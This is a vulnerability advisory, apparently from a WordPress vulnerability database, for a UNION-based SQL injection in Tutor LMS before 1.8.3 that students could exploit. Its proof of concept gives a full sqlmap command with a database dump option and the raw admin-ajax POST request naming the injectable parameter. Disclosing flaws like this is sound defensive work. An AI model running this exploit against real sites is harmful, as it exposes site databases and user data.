WordPress Plugin Vulnerabilities
Tutor LMS < 1.8.3 - SQL Injection via tutor_quiz_builder_get_question_form
Description
The tutor_quiz_builder_get_question_form AJAX action from the plugin was vulnerable to UNION based SQL injection that could be exploited by students.
Proof of Concept
python3 sqlmap.py -r ~/tutorunion4.txt --dbms=mysql --technique=U -p question_id --dump Where tutorunion4.txt is POST /wp-admin/admin-ajax.php HTTP/1.1 Host: [URL] Content-Length: 96 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: [URL] Referer: [URL] Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: [COOKIES] Connection: close action=tutor_quiz_builder_get_question_form&question_id=1&quiz_id
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-03-15 (about 3 years ago)
Added
2021-03-15 (about 3 years ago)
Last Updated
2021-03-20 (about 3 years ago)